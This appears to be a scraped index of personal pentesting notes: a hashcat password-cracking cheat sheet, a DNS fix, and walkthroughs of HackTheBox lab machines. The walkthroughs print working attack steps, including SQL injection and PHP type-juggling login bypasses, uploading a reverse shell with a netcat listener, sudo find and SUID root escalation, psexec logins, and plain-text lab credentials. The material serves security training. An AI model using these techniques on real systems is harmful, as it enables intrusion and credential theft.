    Hashcat is a password recovery tool. It had a proprietary code base until 2015, but was then released as open source software. Versions are available for Linux, OS X, and Windows. Wikipedia

    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#installation","title":"Installation","text":"

    Download from: https://hashcat.net/hashcat/.

    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#basic-commands","title":"Basic commands","text":"
    # Get help \nhashcat -help \n\n# To crack a hash with a dictionary\nhashcat -m 0 -a 0 -D2 example0.hash example.dict\n# -m:  to specify the module of the algorithm we\u2019ll be running. Then -m 0 specifies an MD5 type of hash\n# -a: type of attack. Then -a 0 is a dictionary attack\n# Results are stored in file hashcat.potfile\n
    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#modules","title":"Modules","text":"

    One of the most difficult parts is setting the mode. See https://hashcat.net/wiki/doku.php?id=example_hashes.

    One common error is:

    Approaching final keyspace - workload adjusted.           \nSession..........: hashcat                                \nStatus...........: Exhausted\n

    To fix this, you can use the flag '-w', which is used to set the workload profile. The -w 3 flag specifically sets the workload profile to \"Insane.\"

    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#rules","title":"Rules","text":"

    Located at: /usr/share/hashcat/rules/.

    You can create rules by creating a file called custom.rule and using these commands: https://hashcat.net/wiki/doku.php?id=rule_based_attack.

    After that use the flag -r to be able to use the rule created:

    hashcat -m 0 -a 0 -D2 example0.hash example.dict -r rules/custom.rule\n\nS  \n# By clicking s you can check at any time the status\n

    Generate a mutate password list based on a custom.rule:

    hashcat --force password.list -r custom.rule --stdout > mutated_password.list\n
    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#mask-attacks","title":"Mask attacks","text":"

    These are the possible masks that you can use:

    ?l = abcdefghijklmnopqrstuvwxyz\n?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ\n?d = 0123456789\n?h = 0123456789abcdef\n?H = 0123456789ABCDEF\n?s = \u00abspace\u00bb!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~\n?a = ?l?u?d?s\n?c = Capitalize the first letter and lowercase others\n?sXY = Replace all instances of X with Y.\n?b = 0x00 - 0xff\n?$!     Add the exclamation character at the end.\n

    Hashcat will apply the rules of custom.rule for each word in password.list and store the mutated version in our mut_password.list accordingly.

    Example of a mask attack:

    hashcat -m 0 -a 3 example0.hash ?l?l?l?l?L?l?l?la  \n# first 8 letter will be lowercase and the ninth one will be from the all-character pool\n

    Hashcat and John come with pre-built rule lists that we can use for our password generating and cracking purposes. One of the most used rules is best64.rule

    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#cracking-password-of-microsoft-word-file","title":"Cracking Password of Microsoft Word file","text":"
    cd /root/Desktop/\n/usr/share/john/office2john.py MS_Word_Document.docx > hash\n\ncat hash\n\nMS_Word_Document.docx:$office$*2013*100000*256*16*ff2563844faca58a12fc42c5036f9cf8*ffaf52db903dbcb6ac2db4bab6d343ab*c237403ec97e5f68b7be3324a8633c9ff95e0bb44b1efcf798c70271a54336a2\n\nRemove the first part. Hash would be\n$office$*2013*100000*256*16*ff2563844faca58a12fc42c5036f9cf8*ffaf52db903dbcb6ac2db4bab6d343ab*c237403ec97e5f68b7be3324a8633c9ff95e0bb44b1efcf798c70271a54336a2\n\nhashcat -a 0 -m 9600 --status hash /root/Desktop/wordlists/1000000-password-seclists.txt --force\n# -a 0: dictionary mode\n# -m 9600: Set method to MS Office 2013\n# --status : Enable automatic update of the status screen\n
    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#resources","title":"Resources","text":"

    Examples: cracking common hashes: https://infosecwriteups.com/cracking-hashes-with-hashcat-2b21c01c18ec.

    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#modules-cheatsheet","title":"Modules cheatsheet","text":"

    https://hashcat.net/wiki/doku.php?id=example_hashes

    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#mode-7300-ipmi","title":"mode 7300: IPMI","text":"

    For cracking hashes from IPMI service: In the event of an HP iLO using a factory default password, we can use this Hashcat mask attack command

    hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u\n
    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#module-5600","title":"Module 5600","text":"

    All saved Hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy the hash to a file and attempt to crack it using the hashcat module 5600.

    hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt\n
    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"hashcat/#mode-1800-unshadow-file","title":"Mode 1800: unshadow file","text":"
    hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.cracked\n
    ","tags":["pentesting","enumeration","cracking tool"]},{"location":"how-to-resolve-run-of-the-mill-connection-problems/","title":"How to resolve run-of-the-mill connection problems","text":"
    # Check connection\nping 8.8.8.8\n\n# Check domain resolver\nping google.com\n\n# If pinging 8.8.8.8 works but pinging google.com doesn't, check dns file resolver\n    # Add a new line: \n    # nameserver 8.8.8.8\nsudo nano /etc/resolv.conf\n\n# Check wired connections\nsudo service networking\n
    ","tags":["dns","ping","connection problems"]},{"location":"how-to-resolve-run-of-the-mill-connection-problems/#prevent-etcresolvconf-from-updating","title":"Prevent /etc/resolv.conf from updating","text":"

    By default, NetworkManager dynamically updates the\u00a0/etc/resolv.conf\u00a0file with the DNS settings from active NetworkManager connection profiles. However, you can disable this behavior and manually configure DNS settings in\u00a0/etc/resolv.conf. Steps:

    1. As the root user, create the\u00a0/etc/NetworkManager/conf.d/90-dns-none.conf\u00a0file with the following content by using a text editor:

    [main]\ndns=none\n

    2. Reload the\u00a0NetworkManager\u00a0service:

    systemctl reload NetworkManager\n

    After you reload the service, NetworkManager no longer updates the\u00a0/etc/resolv.conf\u00a0file. However, the last contents of the file are preserved.

    3. Optionally, remove the\u00a0\"Generated by NetworkManager\" comment from\u00a0/etc/resolv.conf\u00a0to avoid confusion.

    Verification

    1. Edit the\u00a0/etc/resolv.conf\u00a0file and manually update the configuration.

    2. Reload the NetworkManager\u00a0service:

    systemctl reload NetworkManager\n````   \n\n**3.**  Display the\u00a0/etc/resolv.conf\u00a0file:\n
    cat /etc/resolv.conf ```

    If you successfully disabled DNS processing, NetworkManager did not override the manually configured settings.

    ","tags":["dns","ping","connection problems"]},{"location":"htb-appointment/","title":"Appointment - A HackTheBox machine","text":"
    nmap -sC -A $ip -Pn\n

    Only port 80 is open.

    It's a login panel with an SQL injection vulnerability.

    To access, enter in username: 1' OR '1'='1';#

    ","tags":["walkthrough"]},{"location":"htb-archetype/","title":"Archetype - A Hack the Box machine","text":"
    nmap  -sC -sV $ip -Pn\n

    Open ports: 135, 139, 445, 1433.

    First, exploit 445. With smbclient, you will download the fileprod.dtsConfig with credentials for mssql database.

    With those credentials you can follow instructions from this impacket module and next instructions to exploit it and get a reverse shell with nc64.exe.

    With that, you will get user.txt in Desktop.

    For escalation of privileges, see technique Recently accessed files and executed commands.

    type C:\\Users\\sql_svc\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt\n

    With admin credentials, you can use impacket's psexec.py module to get an interactive shell on the Windows host with admin rights.

    python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:MEGACORP_4dm1n\\!\\!@10.129.95.187\n
    ","tags":["walkthrough"]},{"location":"htb-bank/","title":"Bank - A HackTheBox machine","text":"

    The entire exploitation of this machine depends on:

    • reconnaissance phase: being able to determine that some \"dns digging\" or \"/etc/host\" changes must be done. Also, there is some guessing. You need to assume that bank.htb is a valid domain for a dns transfer... mmm weird.
    • enumeration phase: using the right dictionary to locate a data breach with password for accessing.

    Later on, other skills are appreciated, such as reading comments on source code.

    ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#users-flag","title":"User's flag","text":"","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#reconnaisance","title":"Reconnaisance","text":"
    nmap -sV -sC -Pn  -p-\n

    Results:

    PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   1024 08eed030d545e459db4d54a8dc5cef15 (DSA)\n|   2048 b8e015482d0df0f17333b78164084a91 (RSA)\n|   256 a04c94d17b6ea8fd07fe11eb88d51665 (ECDSA)\n|_  256 2d794430c8bb5e8f07cf5b72efa16d67 (ED25519)\n53/tcp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)\n| dns-nsid: \n|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu\n80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))\n| http-title: HTB Bank - Login\n|_Requested resource was login.php\n|_http-server-header: Apache/2.4.7 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n

    Let's check UDP connections to port 53:

    sudo nmap -sU -sC -sV -Pn 10.129.29.200 -p53\n

    Results:

    PORT   STATE SERVICE VERSION\n53/udp open  domain  ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)\n| dns-nsid: \n|_  bind.version: 9.9.5-3ubuntu0.14-Ubuntu\nService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel\n

    Open browser and examine http://10.129.29.200 and an Apache web server banner.

    Since the DNS server is running on port 53 TCP/UDP, we can attempt a zone transfer. However, it is worth noting that guessing bank.thb as a valid zone for this transfer is not a very realistic or scientific approach to penetration testing. Nevertheless, since this is HackTheBox and we are playing this game, let's allow ourselves to go with the flow.

    Go here for \"digging more into DNS transfer zones\".

    dig axfr bank.htb @10.129.29.200\n

    Results:

    ; <<>> DiG 9.18.12-1-Debian <<>> axfr bank.htb @10.129.29.200\n;; global options: +cmd\nbank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 6 604800 86400 2419200 604800\nbank.htb.               604800  IN      NS      ns.bank.htb.\nbank.htb.               604800  IN      A       10.129.29.200\nns.bank.htb.            604800  IN      A       10.129.29.200\nwww.bank.htb.           604800  IN      CNAME   bank.htb.\nbank.htb.               604800  IN      SOA     bank.htb. chris.bank.htb. 6 604800 86400 2419200 604800\n

    Add those results to /etc/hosts:

    echo \"10.129.29.200   bank.htb chris.bank.htb ns.bank.htb www.bank.htb\" | sudo tee -a /etc/hosts \n
    ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#enumeration","title":"Enumeration","text":"
    whatweb http://bank.htb\n

    Results:

    http://bank.htb [302 Found] Apache[2.4.7], Bootstrap, Cookies[HTBBankAuth], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[10.129.29.200], JQuery, PHP[5.5.9-1ubuntu4.21], RedirectLocation[login.php], Script, X-Powered-By[PHP/5.5.9-1ubuntu4.21]                                                                                                       \nhttp://bank.htb/login.php [200 OK] Apache[2.4.7], Bootstrap, Cookies[HTBBankAuth], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[10.129.29.200], JQuery, PHP[5.5.9-1ubuntu4.21], PasswordField[inputPassword], Script, Title[HTB Bank - Login], X-Powered-By[PHP/5.5.9-1ubuntu4.21]\n

    After browsing the site, reading the source code and trying some SQL injections, let's do some more enumeration.

    gobuster dir -u http://bank.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \n

    Results:

    /uploads              (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]\n/assets               (Status: 301) [Size: 304] [--> http://bank.htb/assets/]\n/inc                  (Status: 301) [Size: 301] [--> http://bank.htb/inc/]\n/server-status        (Status: 403) [Size: 288]\n/balance-transfer     (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]\n

    We have a data breach under http://bank.htb/balance-transfer/

    ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#exploitation","title":"Exploitation","text":"

    Browsing that exposed URL we can filter columns by size. That would be a quick way to spot the file that contains the credentials (it has a different size from the others). Again, this is HackTheBox and not the reality. In the real world you would probably download as silently as possible all the files, for further processing.

    But this is HackTheBox and we have credentials to proceed to the next step. Login into the dashboard http://bank.htb/login.php:

    --ERR ENCRYPT FAILED\n+=================+\n| HTB Bank Report |\n+=================+\n\n===UserAccount===\nFull Name: Christos Christopoulos\nEmail: chris@bank.htb\nPassword: !##HTBB4nkP4ssw0rd!##\nCreditCards: 5\nTransactions: 39\nBalance: 8842803 .\n===UserAccount===\n

    Browsing around a little, and reading source code, you can easily find a valuable debug comment:

    With this, I just modified my pentesmonkey file to extension .htb and had it uploaded. Under column \"Attachment\" in the dashboard, you have the link to the uploaded file.

    Start a netcat listener:

    nc -lnvp 1234\n

    In my case, I clicked on http://bank.htb/uploads/pentesmonkey.htb and got a reverse shell.

    Cat the user.txt

    ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-bank/#flag-roottxt","title":"Flag root.txt","text":"

    After some basic reconnaissance, I run:

    find / -perm /4000 2>/dev/null\n

    And results:

    /var/htb/bin/emergency\n/usr/lib/eject/dmcrypt-get-device\n/usr/lib/openssh/ssh-keysign\n/usr/lib/dbus-1.0/dbus-daemon-launch-helper\n/usr/lib/policykit-1/polkit-agent-helper-1\n...\n

    /var/htb/bin/emergency catches our attention inmediately. Doing a strings on it we can see that it contains a \"/bin/bash\" command. After resolving this machine, I read this writeup and got some insights about how to investigate an elf file beyond doing some strings. In this writeup, a md5sum is done and googling the hash returned that this elf file is in reality a dash shell.

    Nice. Run the binary and you are root.

    ./var/htb/bin/emergency\n
    ","tags":["walkthrough","enumeration","reverse shell","suid binaries"]},{"location":"htb-base/","title":"Base - A Hack The Box machine","text":"

    Enumerate open ports and services.

    nmap -sC -sV $ip -Pn\n

    Ports 22 and 80 are open.

    Add base.htb to /etc/hosts.

    Enumerate directories:

    gobuster dir -u http://base.htb/login -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/big.txt\n

    Some file and folders uncovered:

    - http://base.htb/_uploaded/\n- http://base.htb/login/\n- http://base.htb/login/login.php\n- http://base.htb/forms/\n- http://base.htb/assets/\n- http://base.htb/logout.php\n

    Under /login there are three files: login.php, config.php and login.php.swp. There are two ways of reading the swap file, with strings and with vim:

    vim -r login.php.swp\n# -r  -- list swap files and exit or recover from a swap file\n

    Content:

    <?php\nsession_start();\nif (!empty($_POST['username']) && !empty($_POST['password'])) {\n    require('config.php');\n    if (strcmp($username, $_POST['username']) == 0) {\n        if (strcmp($password, $_POST['password']) == 0) {\n            $_SESSION['user_id'] = 1;\n            header(\"Location: /upload.php\");\n        } else {\n            print(\"<script>alert('Wrong Username or Password')</script>\");\n        }\n    } else {\n        print(\"<script>alert('Wrong Username or Password')</script>\");\n    }\n}\n

    Quoting from the article PHP Type Juggling Vulnerabilities: \"When comparing values, always try to use the type-safe comparison operator \u201c===\u201d instead of the loose comparison operator \u201c==\u201d. This will ensure that PHP does not type juggle and the operation will only return True if the types of the two variables also match. This means that (7 === \u201c7\u201d) will return False.\"

    My notes about php type jugling.

    In the HackTheBox machine Base, login form was bypasseable by entering an empty array into the username and password parameters:

    Original request\n\n\nPOST /login/login.php HTTP/1.1\nHost: base.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 57\nOrigin: http://base.htb\nConnection: close\nReferer: http://base.htb/login/login.php\nCookie: PHPSESSID=sh4obp53otv54vtsj0g6tev1tt\nUpgrade-Insecure-Requests: 1\n\nusername=admin&password=admin\n
    Crafted request:\n\nPOST /login/login.php HTTP/1.1\nHost: base.htb\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 57\nOrigin: http://base.htb\nConnection: close\nReferer: http://base.htb/login/login.php\nCookie: PHPSESSID=sh4obp53otv54vtsj0g6tev1tt\nUpgrade-Insecure-Requests: 1\n\nusername[]=admin&password[]=admin\n

    How to know? By spotting the file login.php.swp in the /login exposed directory and reading its contents.

    After sending request with BurpSuite, grab the PHPsession cookie and in your browser enter that cookie and go to: http://base.htb/upload.php. Now you can upload our pentesmonkey shell using BurpSuite Repeater (important note: change header to \"Content-Type: image/png\", file extension may remain php). Have your netcat listener ready.

    whoami\n
    www-data\n

    Credentials can be found at /var/www/html/login/config.php. Use them to login as the existing user at /home

    su john\n# enter password: thisisagoodpassword\n

    Once you are john, you have access to user.txt. Also, to be root:

    id\nsudo -l\n
    ohn@base:~$ sudo -l\nsudo -l\n[sudo] password for john: thisisagoodpassword\n\nMatching Defaults entries for john on base:\n    env_reset, mail_badpass,\n    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin\n\nUser john may run the following commands on base:\n    (root : root) /usr/bin/find\n

    See cheat sheet about suid binaries and:

    sudo find . -exec /bin/sh \\; -quit\n

    Now you are root and can echo /root/root.txt

    ","tags":["walkthrough","php type juggling","reverse shell","suid binary","linux privilege escalation"]},{"location":"htb-crocodile/","title":"Crocodile - A HackTheBox machine","text":"
    nmap -sC -A $ip -Pn\n

    Results:

    PORT   STATE SERVICE VERSION\n21/tcp open  ftp     vsftpd 3.0.3\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:10.10.14.2\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 1\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| -rw-r--r--    1 ftp      ftp            33 Jun 08  2021 allowed.userlist\n|_-rw-r--r--    1 ftp      ftp            62 Apr 20  2021 allowed.userlist.passwd\n80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))\n|_http-server-header: Apache/2.4.41 (Ubuntu)\n|_http-title: Smash - Bootstrap Business Template\nService Info: OS: Unix\n

    Now we enumerate directories:

    gobuster dir -e -u http://10.129.1.15/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -r \n

    Results:

    ===============================================================\nGobuster v3.5\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http://10.129.1.15/\n[+] Method:                  GET\n[+] Threads:                 20\n[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster/3.5\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2023/05/01 16:21:20 Starting gobuster in directory enumeration mode\n===============================================================\nhttp://10.129.1.15/assets               (Status: 200) [Size: 1703]\nhttp://10.129.1.15/css                  (Status: 200) [Size: 1350]\nhttp://10.129.1.15/js                   (Status: 200) [Size: 1138]\nhttp://10.129.1.15/fonts                (Status: 200) [Size: 1968]\nhttp://10.129.1.15/dashboard            (Status: 200) [Size: 1577]\nhttp://10.129.1.15/server-status        (Status: 403) [Size: 276]\nProgress: 220534 / 220561 (99.99%)\n===============================================================\n2023/05/01 16:29:51 Finished\n===============================================================\n

    At the same time, we explore ftp service. Anonymous login is allowed.

    ftp 10.129.1.15 \ndir\nmget *\n

    Two files are downloaded.

    cat allowed.userlist\n

    Results:

    aron\npwnmeow\negotisticalsw\nadmin\n

    And passwords:

    cat allowed.userlist.passwd \n

    Results:

    root\nSupersecretpassword1\n@BaASD&9032123sADS\nrKXM59ESxesUFHAd\n

    Now we can enter in http://10.129.1.15/dashboard with credentials for admin. Flag is in the main panel.

    ","tags":["walkthrough"]},{"location":"htb-explosion/","title":"Explosion - A HackTheBox machine","text":"
    nmap -sC -sV $ip -Pn\n
    PORT     STATE SERVICE       VERSION\n135/tcp  open  msrpc         Microsoft Windows RPC\n139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn\n445/tcp  open  microsoft-ds?\n3389/tcp open  ms-wbt-server Microsoft Terminal Services\n| rdp-ntlm-info: \n|   Target_Name: EXPLOSION\n|   NetBIOS_Domain_Name: EXPLOSION\n|   NetBIOS_Computer_Name: EXPLOSION\n|   DNS_Domain_Name: Explosion\n|   DNS_Computer_Name: Explosion\n|   Product_Version: 10.0.17763\n|_  System_Time: 2023-04-27T10:42:37+00:00\n|_ssl-date: 2023-04-27T10:42:45+00:00; 0s from scanner time.\n| ssl-cert: Subject: commonName=Explosion\n| Issuer: commonName=Explosion\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2023-04-26T10:27:02\n| Not valid after:  2023-10-26T10:27:02\n| MD5:   2446e544fced2077f37238e35735b16e\n| SHA-1: cace39c8a8b0ae2a4bf509705cc78f084b9aec0b\n| -----BEGIN CERTIFICATE-----\n| MIIC1jCCAb6gAwIBAgIQadtbfAUkgr5BZjE2eNbcBzANBgkqhkiG9w0BAQsFADAU\n| MRIwEAYDVQQDEwlFeHBsb3Npb24wHhcNMjMwNDI2MTAyNzAyWhcNMjMxMDI2MTAy\n| NzAyWjAUMRIwEAYDVQQDEwlFeHBsb3Npb24wggEiMA0GCSqGSIb3DQEBAQUAA4IB\n| DwAwggEKAoIBAQDSS2eXLWZRkoPS26o641YgH94ZMh9lCyaz2qMPhHsbjNGwZSTC\n| WY+Pm8nAROk5HTTq0CYHWyKZN7I2dONAG42I6pRWdpV3k5NwTj3wCR7BB1WqL5mB\n| CTN7LxfEzngrdU1tPI6FdSkI12I+2h+ckz+2lUaY58+3ENNGe06U82jE8RrEmnFd\n| 0Is0UvA3D3ec2Mzr1Ji8LRko3/rMhggn9T5n75Kh0PstZoRdN+XVjcKfazIfhkZb\n| Wz0/BXcB5fwfSGOWaKcHIL26IviI8DbgS46d4Ydw0tGWE+8BHt3jizillCueg03v\n| TYj4W6d9nqDB1/QmUz9w1tqviUZM7qPCK6qxAgMBAAGjJDAiMBMGA1UdJQQMMAoG\n| CCsGAQUFBwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQsFAAOCAQEANyNIxLXD\n| ftgW+zs+5JGz2WbeLauLLWE3+LJNfMxGWZr9BJAaF4VX0V/dXP3MXLywhqsz+V56\n| mam2jNi44nu4ov+1FgqPKsRdUEb8uOocWEAUE28L48Eh0M09JjVg639REwzqohPV\n| KyqdnHhPkCNH3Js8nJCZkAl6EgWJMWLenD0htNTkJHjtHSR0D3Dyc08WsMPmyOtX\n| m+4Oi8RS7qrHYG0nCvQmJpvNO9eiqYfVVzP5Q06K45hZ/xlVTVePhJFxdVGcc7CH\n| qEILmRdzuvKaRpAD6QocoUm8I3wogOTTV4DcsNOnNSLoFj/TI8i5FV791lZDEzcL\n| bWFK5GD+11kCOw==\n|_-----END CERTIFICATE-----\nService Info: OS: Windows; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n|_clock-skew: mean: 0s, deviation: 0s, median: 0s\n| smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2023-04-27T10:42:40\n|_  start_date: N/A\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 37798/tcp): CLEAN (Couldn't connect)\n|   Check 2 (port 6858/tcp): CLEAN (Couldn't connect)\n|   Check 3 (port 35582/udp): CLEAN (Timeout)\n|   Check 4 (port 50597/udp): CLEAN (Failed to receive data)\n|_  0/4 checks are positive: Host is CLEAN or ports are blocked\n

    After going through all open ports, running this nmap script on 3389 gives us interesting results:

    nmap -Pn -sV -p3389 --script rdp-* $ip\n

    Resolution of machine in port 3389 tricks.

    ","tags":["walkthrough"]},{"location":"htb-friendzone/","title":"Walkthrough - Friendzone, a Hack The Box machine","text":"
    nmap -sC -sV $IP -Pn\n
    \u2514\u2500$ nmap -sC -sV $IP -Pn          \nStarting Nmap 7.93 ( https://nmap.org ) at 2023-04-18 18:23 EDT\nStats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 14.29% done; ETC: 18:23 (0:00:00 remaining)\nStats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 28.57% done; ETC: 18:23 (0:00:00 remaining)\nStats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 28.57% done; ETC: 18:23 (0:00:15 remaining)\nNmap scan report for 10.129.228.87\nHost is up (0.045s latency).\nNot shown: 993 closed tcp ports (conn-refused)\nPORT    STATE SERVICE     VERSION\n21/tcp  open  ftp         vsftpd 3.0.3\n22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 a96824bc971f1e54a58045e74cd9aaa0 (RSA)\n|   256 e5440146ee7abb7ce91acb14999e2b8e (ECDSA)\n|_  256 004e1a4f33e8a0de86a6e42a5f84612b (ED25519)\n53/tcp  open  domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)\n| dns-nsid: \n|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu\n80/tcp  open  http        Apache httpd 2.4.29 ((Ubuntu))\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n|_http-title: Friend Zone Escape software\n139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\n443/tcp open  ssl/http    Apache httpd 2.4.29\n|_http-title: 404 Not Found\n| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO\n| Not valid before: 2018-10-05T21:02:30\n|_Not valid after:  2018-11-04T21:02:30\n|_ssl-date: TLS randomness does not represent time\n|_http-server-header: Apache/2.4.29 (Ubuntu)\n| tls-alpn: \n|_  http/1.1\n445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)\nService Info: Hosts: FRIENDZONE, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel\n\nHost script results:\n| smb2-time: \n|   date: 2023-04-18T22:23:28\n|_  start_date: N/A\n|_clock-skew: mean: -59m59s, deviation: 1h43m54s, median: 0s\n| smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n| smb-os-discovery: \n|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)\n|   Computer name: friendzone\n|   NetBIOS computer name: FRIENDZONE\\x00\n|   Domain name: \\x00\n|   FQDN: friendzone\n|_  System time: 2023-04-19T01:23:29+03:00\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 35.34 seconds\n

    Interesting here: port 53 open. On port 443 you can read:

    | ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO

    We have here domain name friendzone.red. Also visiting the ip in the browser there is an info email with domain friendzoneportal.red.

    Enumerating shares in samba:

    smbclient -L 10.129.228.87\nsmbmap -H 10.129.228.87\n
    An alternative is using enum4linux.md.

    Checking out each shared folder:

    smbclient \\\\\\\\10.129.228.87\\\\Files\nsmbclient \\\\\\\\10.129.228.87\\\\print$\nsmbclient \\\\\\\\10.129.228.87\\\\general\nsmbclient \\\\\\\\10.129.228.87\\\\Developement\nsmbclient \\\\\\\\10.129.228.87\\\\IPC$\n

    From shared folder general and samba terminal we can download the file creds.txt

    dir\nmget *\n
    ","tags":["walkthrough"]},{"location":"htb-friendzone/#transferring-dns-zone","title":"Transferring DNS zone","text":"

    Some HackTheBox machines exploits DNS zone transfer:

    In the example of Friendzone machine, accessible web page on port 80 provides an email in which a different domain is appreciated. Also port 53 is open, which is an indicator of some possible DNS zone transfer.

    In friendzone, we will transfer our zone to all zones spotted in different scanners:

    # friendzone.red was spotted in the nmap scan. Transferring 10.129.228.87 zone to friendzone.red\ndig axfr friendzone.red @10.129.228.87\n\n# Also friendzoneportal.red was spotted in the email that appeared on http://10.129.228.87. Transferring 10.129.228.87 zone to friendzoneportal.red:\ndig axfr friendzoneportal.red @10.129.228.87\n

    Add those subdomains to your /etc/hosts

    Visit https://administrator1.friendzone.red and a login panel is displayed. Use credentials found in samba shared folder. After login into the application a message is displayed: \"Login Done ! visit /dashboard.php\".

    ","tags":["walkthrough"]},{"location":"htb-funnel/","title":"Walkthrough - A HackTheBox machine - Funnel","text":"

    Enumerate port/services:

    nmap -sV -sC $ip -Pn -p-\n

    Open ports: 21 and 22.

    We can log into ftp with anonymous user:

    ftp $ip\n# enter user when prompted: anonymous\n# Press enter when prompted for password.\n

    In the ftp service there is a directory, mail_backup.

    cd mail_backup\nmget *\n

    Get users from file welcome_28112022

    • optimus@funnel.htb
    • albert@funnel.htb
    • andreas@funnel.htb
    • christine@funnel.htb
    • maria@funnel.htb

    Get default password from file password_policy.pdf: \"funnel123#!#\".

    You can use hydra or try out manually to access. Finally user with default password is christine:

    sshpass -p 'funnel123#!#' ssh christine@10.129.228.102\n

